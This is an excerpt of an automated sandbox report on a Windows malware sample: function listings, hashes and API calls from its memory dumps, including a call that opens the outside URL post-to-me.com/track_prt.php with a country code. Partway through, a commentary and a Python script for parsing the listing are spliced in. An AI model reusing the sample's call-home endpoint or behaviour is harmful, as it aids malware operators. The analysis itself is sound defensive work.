• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
• Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D
APIs
• GetLastError.KERNEL32(0210DACD,0210DACD,00000002,0212ED25,02133941,00000000,?,021269F5,00000002,00000000,00000000,00000000,?,0210CF7E,0210DACD,00000004), ref: 021321BA
• _free.LIBCMT ref: 021321EF
• _free.LIBCMT ref: 02132216
• SetLastError.KERNEL32(00000000,?,0210DACD), ref: 02132223
• SetLastError.KERNEL32(00000000,?,0210DACD), ref: 0213222C
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction ID: d17c98884c81a07c221e01167a91e6b062ac5563427542c17ab72a81fb39783a
• Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction Fuzzy Hash: FF01F4365C67007FD31737246C84E2B266FFBC6B72B610128FD25D2290EF758D058569
APIs
• GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
• _free.LIBCMT ref: 00431F01
• _free.LIBCMT ref: 00431F29
• SetLastError.KERNEL32(00000000), ref: 00431F36
• SetLastError.KERNEL32(00000000), ref: 00431F42
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
• Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
APIs
• GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
• _free.LIBCMT ref: 02132168
• _free.LIBCMT ref: 02132190
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                  • Instruction ID: 9e0927ecfe180356faf3b65b0ac30c55be2bef43588e1fb1e0c1b74b04958092
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F081365C56007FD6173728BD09B1A266B9FC2B62B250124FE1892290EBB18916856A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4266703842-0
                                                                                                                                                                                                                                                  • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02112994: TlsGetValue.KERNEL32(?,?,02110DB2,02112EBF,00000000,?,02110D90,?,?,?,00000000,?,00000000), ref: 0211299A
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02117BA1
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02121231
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0212124A
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021212C0
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021212C8
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02117BAF
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02117BB9
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02117BC3
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02117BE1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4266703842-0
                                                                                                                                                                                                                                                  • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction ID: b39b8f2f08f0850a02be051cee40434f5590c5c0e43812909862b81a9795f570
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F02B3164062C6FCF25F775D81096DF727DF80B14B00413AE81153290EF359A568FC5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E4D
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E5F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E71
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E83
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E95
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0B4
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0C6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0D8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0EA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0FC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction ID: 177feedc7a034c6d63ca9214b7eff9e00ec82f77797cacc42cb7287c95b92321
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F03672985300AF8B26EB54F9C6C1A7BDBAE047157640955F098D7721CB31FC908ADD
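The entries above show the same Opcode ID (840ca0e3…, and likewise ddd470ca…) at two dump bases: once in the PE-backed image at Offset 00400000 and once in the region at Offset 02100000 that is "based on PE: false" and carries Yara matches, with a different Instruction ID in each copy. Below is an added example, not part of the Joe Sandbox report and not the sample's code, that parses entries in this listing format and reports every function whose Opcode ID occurs at more than one dump base. The input is constructed from three entries excerpted above with the unused fields dropped; the field names keyed on and the reading of such a cross-dump match as "the function's code was copied into memory the loader did not map from the file" are my assumptions, consistent with the report's "Detected unpacking" signatures.

```python
# Added example (not from the Joe Sandbox report, not the sample's code): parse
# function entries in the listing format above and find Opcode IDs that occur
# at more than one dump base. Field names keyed on are assumptions.
import re
from collections import defaultdict

# Constructed input: three entries abridged from the listing above; fields the
# script does not use (fuzzy hashes, snapshot file, String ID) are omitted.
LISTING = """\
APIs
• _free.LIBCMT ref: 00439E4D
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
APIs
• _free.LIBCMT ref: 0213A0B4
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction ID: 177feedc7a034c6d63ca9214b7eff9e00ec82f77797cacc42cb7287c95b92321
APIs
• GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLast$_free
• Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
• Instruction ID: 9e0927ecfe180356faf3b65b0ac30c55be2bef43588e1fb1e0c1b74b04958092
"""

FIELD = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_listing(text):
    """Return one dict per function entry; an entry starts at a bare 'APIs' line."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"yara": False}
            entries.append(cur)
        elif cur is None or not line:
            continue
        elif line == "Yara matches":
            cur["yara"] = True
        elif (m := FIELD.match(line)):
            key, value = m.group("key").strip(), m.group("value").strip()
            if key == "Source File":
                om = OFFSET.search(value)
                if om:
                    cur["offset"] = int(om.group(1), 16)
                    cur["pe_backed"] = om.group(2) == "true"
            elif key in ("Opcode ID", "Instruction ID", "API ID"):
                cur[key] = value
    return entries


def relocated_functions(entries):
    """Group entries by Opcode ID and keep those seen at more than one dump base.

    The same Opcode ID (operand-independent) with differing Instruction IDs at a
    PE-backed base and at a base not mapped from the file ("based on PE: false")
    is read here as the sample having copied that function into memory it
    allocated itself; this interpretation is an assumption of the example."""
    by_opcode = defaultdict(list)
    for e in entries:
        if "Opcode ID" in e and "offset" in e:
            by_opcode[e["Opcode ID"]].append(e)
    found = {}
    for opcode, group in by_opcode.items():
        offsets = sorted({e["offset"] for e in group})
        if len(offsets) < 2:
            continue
        found[opcode] = {
            "api_id": group[0].get("API ID", ""),
            "offsets": offsets,
            "pe_backed": sorted({e["offset"] for e in group if e["pe_backed"]}),
            "unbacked": sorted({e["offset"] for e in group if not e["pe_backed"]}),
            "instruction_ids": sorted({e.get("Instruction ID", "") for e in group}),
            "yara_hit": any(e["yara"] for e in group),
        }
    return found


if __name__ == "__main__":
    for opcode, info in relocated_functions(parse_listing(LISTING)).items():
        print(f"{opcode[:16]} {info['api_id']}: image copy at {[hex(o) for o in info['pe_backed']]}, "
              f"unbacked copy at {[hex(o) for o in info['unbacked']]}, Yara hit: {info['yara_hit']}")
```

Run against a full listing, the output is the set of functions present both in the on-disk image and in the self-allocated region, which is a quick way to confirm that a non-PE-backed dump is a relocated copy of the original code rather than a freshly decrypted second stage; the ErrorLast function, seen only at 02100000 in this excerpt, is correctly left out.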
APIs
• _free.LIBCMT ref: 00431738
  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
• _free.LIBCMT ref: 0043174A
• _free.LIBCMT ref: 0043175D
• _free.LIBCMT ref: 0043176E
• _free.LIBCMT ref: 0043177F
Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2583373041-0
                                                                                                                                                                                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213199F
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319B1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319C4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319D5
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319E6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction ID: c84d76a7ec8478e47b2b19a290cd224da4698f5ebcffc012ab84ac2ae4a3f894
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0D0B1C50310AF9F226F14BC804047B62AF1972271112A6F41697372C735D966DFDE
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0211CF26
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0211CF57
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0211CF60
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0211CF73
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0211CF7C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2583373041-0
                                                                                                                                                                                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction ID: 49492f052e6bcf0d34cd10f35e7c44bf7b2d4ae7aeb08980cb3f77691da3350b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7F0A036280A019FCA29EF60F9508BB73B6AFC4610300097DE49706564DF31A907DF62
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02102E84
                                                                                                                                                                                                                                                    • Part of subcall function 02101321: _wcslen.LIBCMT ref: 02101328
                                                                                                                                                                                                                                                    • Part of subcall function 02101321: _wcslen.LIBCMT ref: 02101344
                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02103097
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                  • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                  • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                  • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                                                  • Instruction ID: 1d88bd029be202185399ef50839c551340a29599fc01340129a579fe23b7dea2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 215153A5A65344A9E320EFB0BC55B3533B8FF54712F10543AE528CB2B2E7B19944871E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID: BC$BC
                                                                                                                                                                                                                                                  • API String ID: 885266447-2490606219
                                                                                                                                                                                                                                                  • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                                                  • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\L7GNkeVm5e.exe,00000104), ref: 0042F743
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042F80E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042F818
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
